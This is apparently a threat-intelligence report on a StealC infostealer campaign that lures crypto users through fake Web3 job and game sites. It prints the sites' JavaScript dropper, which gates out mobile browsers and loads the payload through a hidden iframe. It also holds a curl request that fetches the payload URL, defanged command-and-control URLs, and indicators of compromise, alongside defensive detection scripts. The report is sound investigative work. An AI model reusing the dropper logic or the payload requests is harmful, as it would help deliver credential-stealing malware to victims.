StealC - Web3 Employment Scams - Composition
===
Research and composition by: ℭ𝔦𝔭𝔥𝔢𝔯
### Table of Contents
[TOC]
Executive Summary
---
This report presents a detailed analysis of a confirmed malicious campaign involving the Stealc malware family, which targets blockchain participants through deceptive executables. Distributed from compromised social media accounts and misleading web domains, this malware has enabled significant financial thefts across the globe. This summary sets out the technical correlations observed during the investigation, discusses the implications of these findings, and provides actionable insights for both the general public and law enforcement agencies.
Confirmed User Impacts Reviewed
---
> Note: Event details below have been compiled from adversely impacted users, who kindly allowed me to assist them with reviewing their respective cases and have granted me permission to include redacted variants of those instances within this composition. This is not a complete list of those impacted by this malware campaign; a more comprehensive list of impacted users can be provided to law enforcement upon request.
#### Twitter - Case 1
| **Key Information** | **Detail** |
|:--------------------------------- |:-------------------------------------------------------------------------------------------------------------------------- |
| Incident Date and Time | `Mar-06-2024 07:09:06 PM +UTC` |
| Malware and Delivery Site | "Stealc" malware at `Segwit[.]blog` |
| Snapshot of Malicious Site | [urlscan.io/result/73ce9a5a-1824-45ad-bda1-fa866f6b5c2e/](https://urlscan.io/result/73ce9a5a-1824-45ad-bda1-fa866f6b5c2e/) |
| Malware Delivery Site Access Code | N/A |
| Malware Distributed By | @Bowfr0g on Twitter, ID: N/A |
| Platform | Username | Platform ID | Platform Cryptocurrency Address | Scammer Address |
| :------- | -------- | :---------- | :------------------------------ | -------------------------------------------- |
| Twitter | @Bowfr0g | N/A | N/A | `0x5959424246a971d115dd2394c9fcfb9e1b7df54e` |
#### Twitter - Case 2
| **Key Information** | **Detail** |
| :-------------------------------- | :------------------------------------------------------------------------------------- |
| Incident Date and Time | `2024-03-20 22:33:11 UTC` |
| Malware and Delivery Site | "Stealc" malware at `Spectra[.]chat` |
| Snapshot of Malicious Site | [tria.ge/240315-lfj78ach6w/behavioral1](https://tria.ge/240315-lfj78ach6w/behavioral1) |
| Malware Delivery Site Access Code | N/A |
| Malware Distributed By | @Eddy_Bear27 on Twitter, ID:160548447 |
| Platform | Username | Platform ID | Platform Cryptocurrency Address | Scammer Address |
|:-------- |:-------------- |:------------------ |:------------------------------- |:-------------------------------------------- |
| Twitter | @socialspectra | 2545667479 | N/A | |
| Twitter | @doublexander | 888473816728567809 | N/A | |
| Twitter | @0x_jiang | 998988969118400512 | N/A | |
| Twitter | @dj_kubaking | 599584449 | N/A | |
| Twitter | @Eddy_Bear27 | 160548447 | N/A | `0xAf11b5871f5Db632481CAF863503633FFF34a298` |
#### Warpcast - Case 1
| **Key Information** | **Detail** |
| :-------------------------------- | :------------------------------------------------------------------------------------- |
| Incident Date and Time | `April 14, 2024 8:30AM EST` |
| Malware and Delivery Site | "Stealc" malware at `cozymeta[.]xyz/join-metaverse` |
| Malware Delivery Site Access Code | B89WB |
| Malware Distributed By | @jane- on Warpcast, FID:351885 |
| Snapshot of Malicious Site | [tria.ge/240414-ychw7see8v/behavioral1](https://tria.ge/240414-ychw7see8v/behavioral1) |
| Platform | Username | Platform ID | Platform Cryptocurrency Address | Scammer Address |
| :------- | -------- | :---------- | :------------------------------ | -------------------------------------------- |
| Warpcast | jane- | 351885 | N/A | `0x06836d23a8b13f2d25a246d43787612ad7fc9009` |
#### Warpcast - Case 2
| **Key Information** | **Detail** |
| --------------------------------- | :------------------------------------------------------------------------------------- |
| Incident Date and Time | April 16, 2024, 06:11:03 PM UTC |
| Malware and Delivery Site | "Stealc" malware at `cozymeta[.]xyz/join-metaverse` |
| Malware Delivery Site Access Code | RFWEF |
| Malware Distributed By | @lampa on Warpcast, FID:372912 |
| Snapshot of Malicious Site | [tria.ge/240315-lfj78ach6w/behavioral1](https://tria.ge/240315-lfj78ach6w/behavioral1) |
| Platform | Username | Platform ID | Platform Cryptocurrency Address | Scammer Address |
|:-------- | ---------- |:----------- |:-------------------------------------------- |:-------------------------------------------- |
| Warpcast | Lampa | 372912 | `0x47ad1c7ea118f740fd54cdad14f776c66f814440` | `0xE8c8dC22Bacf97D48a20C3Bc493878E262D935C3` |
| Telegram | @Lampa_eth | N/A | N/A | |
Technical Analysis
---
### Analysis from "Twitter - Case 1" Initial Segwit[.]blog sample
Victim’s browser activity and file downloads confirmed interactions with `Segwit.blog` and `Segwit.exe`. As such, the relevant source code of `Segwit.blog` was analyzed, stored, and cataloged for further analysis.
The following section elaborates on the analysis conducted on `Segwit.blog`.
**Preface:** The primary function of `Segwit.blog` website is to serve as a social engineering agent and as a malware payload delivery system.
**Analysis Environment Configuration:** Analysis of `Segwit.blog` was conducted at 11:30PM EST on March 7th, 2024, using a browserling.com virtual instance in a Windows 10 configuration running Google Chrome version 119.
*`Segwit.blog` frontend*
The image above is a sample captured from the `Segwit.blog` instance on the same day that funds were stolen from the victim. As can be observed, the instance clearly depicts an **"open"**, inviting **"web3 community"** environment. At a cursory glance the instance does not appear malicious; if anything, quite the contrary: all users need to do is provide a wallet address, sign up and, logically, install `Segwit Setup.exe`. The issue is that the website has been intentionally designed to deceive users and evade detection. How this was accomplished through the file named `7011-d483282552489351.js` is documented below.
#### **7011-d483282552489351.js**
<br />
<div style="display: flex; justify-content: space-between;">
<div align="left" style="width: 30%;">
```mermaid
flowchart TB
start[start]
checkAvailable[Check window.available<br><sub>Line: 4</sub>]
checkBrowser[Check browser agent<br><sub>Lines: 6-9</sub>]
osCheck[Check if Mac or Windows<br><sub>Line: 14</sub>]
makePostRequest[Make API POST Request<br><sub>Lines: 14-20</sub>]
handleError[Handle Error<br><sub>Line: 24</sub>]
handleApiResponse[Handle API Response<br><sub>Lines: 22-23</sub>]
createIframe[Create and Load Iframe<br><sub>Line: 30</sub>]
setTrueState[Set True State<br><sub>Line: 25</sub>]
showAlert[Show Alert<br><sub>Lines: 6, 15</sub>]
start --> checkAvailable
checkAvailable -->|false| checkBrowser
checkAvailable -->|true| showAlert
checkBrowser -->|Mobile| showAlert
checkBrowser -->|Desktop| osCheck
osCheck --> makePostRequest
makePostRequest -->|Success| handleApiResponse --> createIframe --> setTrueState
makePostRequest -->|Fail| handleError
```
</div>
<div align="right" style="width: 70%; font-size: 12px;">
```javascript=
u = async (e) => {
    try {
        // Mobile user-agent gate: the download is only offered to desktop browsers
        const test = function() {
            let check = false;
            (function(a) {
                if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino|android|ipad|playbook|silk/i.test(a) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0, 4))) check = true;
            })(navigator.userAgent || navigator.vendor || window.opera);
            return check;
        };
        if (window.available === false || test()) {
            alert('Download is not available for your browser!');
            return;
        }
        // OS-keyed sign-up request; the JSON response carries the payload URL
        let t = await fetch(`/api/sign-up?system=${window.isMac ? 'mac': 'win'}&key=${window.__id}`, {
            method: "POST",
            headers: {
                "Content-Type": "application/json"
            },
            body: JSON.stringify(e),
        });
        if (!t.ok) {
            let {
                error: e
            } = await t.json();
            throw Error(e.message);
        }
        debugger;
        let data = await t.json();
        // Hidden iframe pointed at the returned URL starts the file download
        var n = document.createElement("iframe");
        n.style.display = "none";
        n.src = data.data;
        document.body.appendChild(n);
        d(!0);
    } catch (e) {
        r.negative("Something went wrong. Please try again later."),
        console.error(e);
    }
}
```
</div>
</div>
#### **Code Explained**
The script above performs device detection, conditional execution, API interaction, and dynamic content loading within a web environment:
1. **Device Type Detection**: Identifies mobile devices via user agent analysis to tailor behavior.
2. **Conditional Execution**: Uses `window.available` and the device type to control flow, displaying an alert and stopping further actions for incompatible devices.
3. **API<sub>[^2]</sub> Interaction**: Makes a POST request to a sign-up API that includes the operating system type (Mac/Windows); this lets the server vary its response per platform.
4. **Dynamic iFrame<sub>[^3]</sub> Creation**: On a successful API response, creates an iFrame element and loads the URL from the response into it. This step is key to seamlessly integrating additional content or scripts.
5. **Error Handling**: Wraps the flow in try-catch, showing a generic failure notification and logging errors to the console.
6. **State Update**: Calls `d(!0)` to signal task completion or a state change within the application.
These operations, particularly device detection and dynamic content loading via iFrames, vary the page's behaviour according to the client's environment and execute additional code discreetly, which is what lets the site evade signature-based detection.
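The six steps above describe a chain (mobile gate, availability flag, OS-keyed sign-up POST, hidden iframe fed from the JSON response) that is far more telling in combination than any one step alone. The following Python is an added example, not code from the report or from the site analysed, that scores a captured script body against those indicators; the indicator names, weights and both sample scripts are constructed for this example.

```python
import re

# Heuristic indicators distilled from the behaviour of 7011-d483282552489351.js
# explained above: a mobile user-agent gate, a window.available flag gate, an
# OS-keyed POST to /api/sign-up, and a hidden iframe whose src comes from the
# JSON response. Weights are an assumption for this example, not a published
# scoring scheme; tune them against your own corpus of benign sign-up scripts.
INDICATORS = [
    ("mobile_ua_gate",
     re.compile(r"navigator\.userAgent\s*\|\|\s*navigator\.vendor"), 1),
    ("availability_flag_gate",
     re.compile(r"window\.available\s*===?\s*false"), 1),
    ("os_keyed_signup",
     re.compile(r"/api/sign-up\?system=\$\{[^}]*isMac"), 3),
    ("hidden_iframe",
     re.compile(r'''createElement\(\s*["']iframe["']\s*\)'''), 2),
    ("iframe_hidden_style",
     re.compile(r'''\.style\.display\s*=\s*["']none["']'''), 1),
    ("iframe_src_from_response",
     re.compile(r"\.src\s*=\s*\w+\.data\b"), 2),
]


def assess_dropper_script(js_text):
    """Return (score, hit_names) for one script body."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(js_text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def is_suspected_dropper(js_text, threshold=6):
    """True when enough of the chained indicators co-occur in one script.
    Any single indicator is common in benign code; the combination is not."""
    return assess_dropper_script(js_text)[0] >= threshold


# Constructed sample that mirrors the structure of the captured script.
SAMPLE_DROPPER = r'''
u = async (e) => {
  const test = function () {
    let check = false;
    (function (a) { if (/android|iphone|mobile/i.test(a)) check = true; })(
      navigator.userAgent || navigator.vendor || window.opera);
    return check;
  };
  if (window.available === false || test()) {
    alert('Download is not available for your browser!');
    return;
  }
  let t = await fetch(`/api/sign-up?system=${window.isMac ? 'mac' : 'win'}&key=${window.__id}`,
                      { method: "POST", body: JSON.stringify(e) });
  let data = await t.json();
  var n = document.createElement("iframe");
  n.style.display = "none";
  n.src = data.data;
  document.body.appendChild(n);
};
'''

# Constructed benign newsletter sign-up for comparison.
SAMPLE_BENIGN = r'''
async function subscribe(email) {
  const r = await fetch('/api/subscribe', { method: 'POST', body: JSON.stringify({ email }) });
  if (!r.ok) { alert('Please try again later'); }
}
'''

if __name__ == "__main__":
    for label, body in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        score, hits = assess_dropper_script(body)
        print(f"{label}: score={score} hits={hits} flagged={is_suspected_dropper(body)}")
```

Run it over scripts pulled from a urlscan.io or tria.ge capture of a suspect site; a hit on `os_keyed_signup` together with the iframe indicators is the combination worth triaging first.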
#### **Payload Delivery**
Executable Payload Delivered: `Segwit Setup.exe`
Signatures:
| **Name** | **Algorithm** | **File Hash** |
|:----------------- | ---------- |:------------------------------------------------------------------ |
| `SegwitSetup.exe` | **MD5** | `a22d71549d6b60c8c270503f585530ec` |
| `SegwitSetup.exe` | **SHA1** | `0cb40b824f878a46e7bd55498331f2b87ddd6b25` |
| `SegwitSetup.exe` | **SHA256** | `7c6543af2eea8ed933e0898bdbcfc642f0c11bece904b366ca939da9e76465eb` |
The payload that `7011-d483282552489351.js` requested via the [POST request](#7011-d483282552489351[.]js/api/sign-up?system=win) in this case was a Windows executable named `Segwit Setup.exe`; this was verified via a controlled, direct interaction with the website approximately six hours after the initial adverse event. The executable was hosted on a [Dropbox account](#dropbox-response). The request was crafted to retrieve the payload while appearing to the user's device as a benign file download. In other cases the payload was observed to be delivered as a macOS-compatible DMG instead, in which case the payload file size was considerably smaller.
Once downloaded and executed, the malicious payload begins its Stealc functionality: on Windows it embeds itself into the system registry for session persistence, and it sends the victim's credentials to either a Telegram or a Discord channel. At this point the attack itself is not over, as the malicious actors then transfer the user's funds through a variety of cryptocurrency exchanges. The first transfers can be noticed from the impacted user's account, which typically begins unauthorized transfers of the user's cryptocurrency assets within a five-minute window after exploitation. The initial transfers follow a 25/75 fund split, from which it can be speculated that approximately 25% of the stolen funds go to a likely malware-as-a-service vendor that supplies the "customer" with the infostealer for use via social media communications.
##### **7011-d483282552489351[.]js/api/sign-up?system=win**
```bash
curl 'hxxps[://]segwit[.]blog/api/sign-up?system=win&key=null' \
-H 'authority: segwit[.]blog' \
-H 'accept: */*' \
-H 'accept-language: en-US,en;q=0.9' \
-H 'content-type: application/json' \
-H 'origin: hxxps[://]segwit[.]blog' \
-H 'referer: hxxps[://]segwit[.]blog/' \
-H 'sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"' \
-H 'sec-ch-ua-mobile: ?0' \
-H 'sec-ch-ua-platform: "Windows"' \
-H 'sec-fetch-dest: empty' \
-H 'sec-fetch-mode: cors' \
-H 'sec-fetch-site: same-origin' \
-H 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119[.]0[.]0[.]0 Safari/537.36' \
--data-raw '{"ethAddress":"bobjones[.]eth"}' \
--compressed
```
##### **dropbox-response**
```json!
{
"resp": true,
"data": "hxxps[://]www[.]dropbox[.]com/scl/fi/5sbs7pzead0zqy4gi7r4s/Segwit-Setup[.]exe?rlkey=bill6374m4u45wz6qifxnl7de&dl=1"
}
```
<br />
Patterns
---
### MITRE Techniques
| Tactic | Techniques |
| -------------------- |:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Defense Evasion | [Access Token Manipulation - T1134](https://attack.mitre.org/techniques/T1134/)<br />[Software Packing - T1045](https://attack.mitre.org/techniques/T1045/)<br />[Indicator Removal on Host - T1070](https://attack.mitre.org/techniques/T1070/)<br />[Rundll32 - T1085](https://attack.mitre.org/techniques/T1085/)<br />[Modify Registry - T1112](https://attack.mitre.org/techniques/T1112/) |
| Discovery | [System Owner/User Discovery - T1033](https://attack.mitre.org/techniques/T1033/)<br />[Software Discovery - T1518](https://attack.mitre.org/techniques/T1518/)<br />[Query Registry - T1012](https://attack.mitre.org/techniques/T1012/) |
| Privilege Escalation | [Access Token Manipulation - T1134](https://attack.mitre.org/techniques/T1134/) |
| Impact | [Endpoint Denial of Service - T1499](https://attack.mitre.org/techniques/T1499/) |
| Execution | [Command and Scripting Interpreter - T1059](https://attack.mitre.org/techniques/T1059/) |
#### Initial Discovery
The initial sample for this investigation was encountered at the web domain segwit[.]blog. The attack vector was a malicious payload disguised as a Windows video game executable and distributed through a stolen Twitter account. From this instance, monitoring was configured on the endpoint segwit[.]blog across a number of elements of its functionality. One element that yielded interesting results was its homepage image, **filename: "Homepage_Hero_Desktop_Frame"**, with SHA256 file **hash: 7c7516dcff0bf59e7afc2cf3a3265c578d0c19c82bfb73ddaff1124a58bb88e6**. Within a week of the initial theft incident, a new domain recycling the same web assets appeared as "spectra[.]chat". Tests conducted on this unit for payload deployment correlations yielded a signature match to the Stealc malware family.
#### Linkages and Recurring Patterns
Analysis of "spectra[.]chat" revealed numerous social media accounts, Twitter posts, and website references promoting "employment opportunities". A "job board" connected to the website was hosted via Notion.so, specifically at the web domain segwit[.]notion[.]site, with a web archive capture available [here](https://web.archive.org/web/20240308171520/https://segwit.notion.site/Job-Board-Segwit-App-4cc59bafbaf14786a0a7f072c111a3ee). The correlations between spectra[.]chat and segwit[.]blog appear substantial. Further analysis of the connected Link3 instance prompted an examination of variations of the segwit domain, with different iterations observed during a one-month monitoring span, as well as the [pattern](https://urlscan.io/search/#hash%3A7c7516dcff0bf59e7afc2cf3a3265c578d0c19c82bfb73ddaff1124a58bb88e6) used to monitor these instances:
| Iteration Number | Website | Urlscan |
|:--------------------- |:------------------ |:---------------------------------------------------------------------------------------------------------------------------------- |
| 1 (likely copied unit) | status\[.\]app | |
| 2 | segwit\[.\]blog | [https://urlscan.io/result/f77f84aa-0074-4fe3-a60d-c335ae62cc7a/](https://urlscan.io/result/f77f84aa-0074-4fe3-a60d-c335ae62cc7a/) |
| 3 (linktree) | segwit\[.\]pro | [https://urlscan.io/result/9573f2db-eef8-4fcc-b7c4-8e63a195c0b4/](https://urlscan.io/result/9573f2db-eef8-4fcc-b7c4-8e63a195c0b4/) |
| 4 | segwit\[.\]app | [https://urlscan.io/result/1cd8179b-46b9-4ada-bec3-279b3dae1494/](https://urlscan.io/result/1cd8179b-46b9-4ada-bec3-279b3dae1494) |
| 5 | spectra\[.\]chat | [https://urlscan.io/result/8e7b914d-1274-4540-ba4f-67e088f1721a/](https://urlscan.io/result/8e7b914d-1274-4540-ba4f-67e088f1721a/) |
| 6 | spectra\[.\]social | [https://urlscan.io/result/ad216e79-3a47-4f2e-afb0-87a750c62867/](https://urlscan.io/result/ad216e79-3a47-4f2e-afb0-87a750c62867/) |
The correlation between these websites and the recycling of web assets, together with the reuse of a malware payload designed to evade antivirus detection, depict the sophisticated nature of this threat actor. The remaining components under review included social media accounts and other associated links from the [segwit link3](https://urlscan.io/result/dbf6e3b8-ddab-4593-93b5-181ca16bcd7b/#summary), showing connections between the now suspended Segwit Twitter account, a mirror publishing cryptocurrency address, a company registration in the United Kingdom, and current "employees" of segwit[.]blog.

*Members of the Segwit team as shown through link3*
- [Fund Deviations[PUBLIC]](/90bFKQkTSqS0AtNwPOD6Gg)
- [Twitter Data](/oonwUDGVSJ2KVCw2Ggo10A)
- TBA
#### Search Queries
Triage (tria.ge):
```text
family:stealc AND family:rhadamanthys NOT family:lumma NOT family:amadey NOT family:risepro NOT family:glupteba
```
Urlscan:
```text
https://urlscan.io/search/#filename:%22remove_html.js%22
```
### Configuration Relays
- `showpiecekennelmating[.]com`
- Private config files: [showpiecekennelmating[.]com/files/private/config](https://showpiecekennelmating[.]com/files/private/config)

### Loader Patterns
- Regex pattern for loaders: `\\b[a-zA-Z]+(?:-[a-zA-Z]+)*-Setup\\.exe\\b`
- Analysis via UnPacMe: [https://www.unpac.me/results/a4e24a0a-7780-43d1-8328-f342c79420b6#/](https://www.unpac.me/results/a4e24a0a-7780-43d1-8328-f342c79420b6#/)
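The loader regex above only matches hyphen-joined names ending in `-Setup.exe`, which fits the Dropbox filename `Segwit-Setup.exe` but not several of the sample names listed further down (`Segwit_Setup.exe`, `Wion Setup.exe`, `AppDFSetup.exe`). The following Python is an added example, not from the report, that runs the page's pattern (its doubled backslashes assumed to be string escaping and reduced to single ones) beside a broadened variant that is my own assumption, over a constructed name list taken from the report's tables plus two controls.

```python
import re

# The page's loader-name pattern, with its doubled backslashes reduced to single
# ones (assumed to be string escaping in the original). It requires the words
# to be hyphen-joined and to end in "-Setup.exe".
PAGE_LOADER_RE = re.compile(r"\b[a-zA-Z]+(?:-[a-zA-Z]+)*-Setup\.exe\b")

# Broadened variant (an assumption for this example, not from the page): words
# may be joined by space, underscore or hyphen, and the separator before
# "Setup" is optional, so "AppDFSetup.exe" and "Wion Setup.exe" also match.
BROAD_LOADER_RE = re.compile(
    r"\b[A-Za-z]+(?:[ _-][A-Za-z]+)*[ _-]?Setup\.exe\b", re.IGNORECASE)

# Constructed list: sample names from the report's tables plus two controls.
SAMPLE_NAMES = [
    "Segwit-Setup.exe",      # Dropbox filename from the dropbox-response above
    "Segwit_Setup.exe",
    "Wion Setup.exe",
    "Vortax App Setup.exe",
    "AppDFSetup.exe",
    "PartyRoyale.exe",
    "MeetHub.exe",
    "notepad.exe",
]


def matches(pattern, names):
    """Names from `names` in which the compiled `pattern` finds a match."""
    return [n for n in names if pattern.search(n)]


def missed_by_page_pattern(names):
    """Loader-style names the broadened pattern catches but the page's does not."""
    broad = set(matches(BROAD_LOADER_RE, names))
    narrow = set(matches(PAGE_LOADER_RE, names))
    return sorted(broad - narrow)


if __name__ == "__main__":
    print("page pattern :", matches(PAGE_LOADER_RE, SAMPLE_NAMES))
    print("broad pattern:", matches(BROAD_LOADER_RE, SAMPLE_NAMES))
    print("missed       :", missed_by_page_pattern(SAMPLE_NAMES))
```

The broadened form trades precision for recall (any legitimate "<name> Setup.exe" installer also matches), so pair it with the file hashes or the helperFiles fetch pattern rather than alerting on the name alone.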
### Indicators of Compromise (IOCs)
| IOC |
| ---------------------------------- |
| AdjustTokenPrivileges@ADVAPI32.dll |
| LookupPrivilegeValueW@ADVAPI32.dll |
| OpenProcessToken@ADVAPI32.dll |
| Found string artifact shell32.dll |
| RegEnumValueW@ADVAPI32.dll |
| RegEnumKeyW@ADVAPI32.dll |
| RegQueryValueExW@ADVAPI32.dll |
| RegSetValueExW@ADVAPI32.dll |
| RegCloseKey@ADVAPI32.dll |
| RegDeleteValueW@ADVAPI32.dll |
| RegDeleteKeyW@ADVAPI32.dll |
| RegCreateKeyExW@ADVAPI32.dll |
| SetFileAttributesW@KERNEL32.dll |
| ExitWindowsEx@USER32.dll |
| GetCommandLineW@KERNEL32.dll |
### IOC Samples Uploaded to VirusTotal
- VirusTotal collection: [virustotal.com/gui/collection/1c180203a34147e613744dfc3b39d9a497f68c479729977185c7dadeb8288b3a/iocs](https://www.virustotal.com/gui/collection/1c180203a34147e613744dfc3b39d9a497f68c479729977185c7dadeb8288b3a/iocs)
| Submission | SHA256 | Type | Verdict | Date | Tags |
|:---------- |:------ |:---- |:------- |:---- |:---- |
| PartyRoyale.exe | `0aef1e1f5f8cef19c63977278ca550ae4196d6ea13d51bc706bb64f03ea64ec6` | application/x-dosexec | Likely malicious | 05/02/2024, 04:13:01 | [peexe](https://www.filescan.io/search-result?tag=peexe), [txt](https://www.filescan.io/search-result?tag=txt), [xml](https://www.filescan.io/search-result?tag=xml), [packed](https://www.filescan.io/search-result?tag=packed), [lolbin](https://www.filescan.io/search-result?tag=lolbin), [overlay](https://www.filescan.io/search-result?tag=overlay), [shell32](https://www.filescan.io/search-result?tag=shell32) |
| AppDFSetup.exe | `593c83930d6f0ca5e300b1728ed0a793d71ade9bbf3ab5ca6a4c38769c093a36` | application/x-dosexec | Likely malicious | 05/02/2024, 03:57:35 | [peexe](https://www.filescan.io/search-result?tag=peexe), [html](https://www.filescan.io/search-result?tag=html), [packed](https://www.filescan.io/search-result?tag=packed), [lolbin](https://www.filescan.io/search-result?tag=lolbin), [overlay](https://www.filescan.io/search-result?tag=overlay), [shell32](https://www.filescan.io/search-result?tag=shell32) |
| Wion Setup.exe | `67900fd8ba19d8be310f7db1a55073da24a4ba8b719c50520840fc77e571216b` | application/x-dosexec | Likely malicious | 05/01/2024, 23:09:21 | [peexe](https://www.filescan.io/search-result?tag=peexe), [html](https://www.filescan.io/search-result?tag=html), [packed](https://www.filescan.io/search-result?tag=packed), [lolbin](https://www.filescan.io/search-result?tag=lolbin), [overlay](https://www.filescan.io/search-result?tag=overlay), [shell32](https://www.filescan.io/search-result?tag=shell32) |
| Vortax App Setup.exe | `f3176e0859ba92049dcd57685c1b5f49b97183ff49fcc79f2ce4ad2b31d2d843` | application/x-dosexec | Likely malicious | 04/30/2024, 20:49:06 | [peexe](https://www.filescan.io/search-result?tag=peexe), [packed](https://www.filescan.io/search-result?tag=packed), [lolbin](https://www.filescan.io/search-result?tag=lolbin), [overlay](https://www.filescan.io/search-result?tag=overlay), [shell32](https://www.filescan.io/search-result?tag=shell32) |
| MeetHub.exe | `d96dd19f1fcd20277cee365d5fda7ecd1a776c046b2468d89f5f6a80a7d85c9f` | application/x-dosexec | Malicious | 04/30/2024, 20:47:05 | [peexe](https://www.filescan.io/search-result?tag=peexe), [lolbin](https://www.filescan.io/search-result?tag=lolbin), [overlay](https://www.filescan.io/search-result?tag=overlay), [packed](https://www.filescan.io/search-result?tag=packed), [shell32](https://www.filescan.io/search-result?tag=shell32) |
| VDeck Setup.exe | `c29f6ca9ca0cbe27b9da4499d70add923459d23e69a701772530331a43cd71f8` | application/x-dosexec | Likely malicious | 04/30/2024, 20:46:16 | [peexe](https://www.filescan.io/search-result?tag=peexe), [html](https://www.filescan.io/search-result?tag=html), [packed](https://www.filescan.io/search-result?tag=packed), [lolbin](https://www.filescan.io/search-result?tag=lolbin), [overlay](https://www.filescan.io/search-result?tag=overlay), [shell32](https://www.filescan.io/search-result?tag=shell32) |
| Cozy World Setup.exe | `4cd4f861a3294923fc97f741927c8b67543ac54cfde6692c9e151920b1f61a19` | application/x-dosexec | Likely malicious | 04/30/2024, 09:01:10 | [peexe](https://www.filescan.io/search-result?tag=peexe), [packed](https://www.filescan.io/search-result?tag=packed), [lolbin](https://www.filescan.io/search-result?tag=lolbin), [overlay](https://www.filescan.io/search-result?tag=overlay), [shell32](https://www.filescan.io/search-result?tag=shell32) |
| Goheard.exe | `0ea35162ffccf5939f70fd8a932abe357cc4b84c96eb203ccc24bddbc08fc9ab` | application/x-dosexec | Likely malicious | 04/29/2024, 20:24:19 | [peexe](https://www.filescan.io/search-result?tag=peexe), [txt](https://www.filescan.io/search-result?tag=txt), [xml](https://www.filescan.io/search-result?tag=xml), [lolbin](https://www.filescan.io/search-result?tag=lolbin), [overlay](https://www.filescan.io/search-result?tag=overlay), [packed](https://www.filescan.io/search-result?tag=packed), [shell32](https://www.filescan.io/search-result?tag=shell32) |
| Segwit_Setup.exe | `7c6543af2eea8ed933e0898bdbcfc642f0c11bece904b366ca939da9e76465eb` | application/x-dosexec | Likely malicious | 04/29/2024, 07:20:28 | [peexe](https://www.filescan.io/search-result?tag=peexe), [html](https://www.filescan.io/search-result?tag=html), [packed](https://www.filescan.io/search-result?tag=packed), [lolbin](https://www.filescan.io/search-result?tag=lolbin), [overlay](https://www.filescan.io/search-result?tag=overlay), [shell32](https://www.filescan.io/search-result?tag=shell32) |
| Spectra Setup.exe | `c4b3a3f21ad54d5c3370669ce1ff6c39f2affbaa02fdd42acfbd844c9c4074f9` | application/x-dosexec | Likely malicious | 04/29/2024, 07:17:58 | [peexe](https://www.filescan.io/search-result?tag=peexe), [xml](https://www.filescan.io/search-result?tag=xml), [packed](https://www.filescan.io/search-result?tag=packed), [lolbin](https://www.filescan.io/search-result?tag=lolbin), [overlay](https://www.filescan.io/search-result?tag=overlay), [shell32](https://www.filescan.io/search-result?tag=shell32) |
### IP Addresses Analysis
- VirusTotal graph: [virustotal.com/graph/g85ebc1fe497a495ebdad466bb04b9cde1e325be168ca4a4f85db0769271586bb](https://www.virustotal.com/graph/g85ebc1fe497a495ebdad466bb04b9cde1e325be168ca4a4f85db0769271586bb)
### Observed Structural Pattern of "helperFiles"
| Type | ID |
| ---- | -------------------------------------------------------------- |
| URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/mozglue.dll` |
| URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/msvcp140.dll` |
| URL | `hxxp://193[.]163[.]7[.]129/3fb765dac3e38c00/freebl3.dll` |
